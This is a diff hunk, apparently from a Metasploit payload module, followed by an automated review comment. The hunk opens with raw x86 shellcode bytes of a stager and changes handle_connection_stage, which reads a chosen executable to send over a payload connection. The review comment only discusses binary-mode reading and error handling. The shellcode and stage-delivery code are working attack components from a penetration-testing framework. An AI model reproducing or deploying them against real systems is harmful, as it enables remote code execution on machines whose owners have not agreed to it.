"\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
|
||||
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
|
||||
"\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
|
||||
"\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
|
||||
"\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
|
||||
"\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
|
||||
"\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
|
||||
"\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
|
||||
"\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" +
|
||||
"\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
@ -73,7 +72,12 @@ module Metasploit3
|
||||
#
|
||||
def handle_connection_stage(conn)
|
||||
begin
|
||||
data = ::IO.read(datastore['PEXEC'])
|
||||
# bug fix for: data = ::IO.read(datastore['PEXEC'])
|
||||
# the above does not return the entire contents
|
||||
data = ""
|
||||
File.open( datastore['PEXEC'], "rb" ) { |f|
|
||||
data += f.read
|
||||
}
|
||||
rescue
|
||||
print_error("Failed to read executable: #{$!}")
|
||||
|
||||
|
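Review bot: The `# bug fix for: data = ::IO.read(datastore['PEXEC'])` comment in handle_connection_stage records the symptom ("does not return the entire contents") but not the cause; `IO.read` without a mode presumably opens the file in text mode, where a Windows host applies newline translation and stops at an EOF marker, which is why an executable came back short — stating that would stop the next maintainer from reverting to the one-liner. The `data = ""` plus `data += f.read` pair can be collapsed to `data = File.open(datastore['PEXEC'], "rb") { |f| f.read }`, which keeps the binary mode and drops the extra string copy. The bare `rescue` still folds a missing file, a permission error and a directory path into one `print_error`, which is acceptable for a user-supplied path but deserves a `# any read failure is reported, not raised` note. The method body continues past the end of the hunk, so the return path after `print_error` could not be checked here.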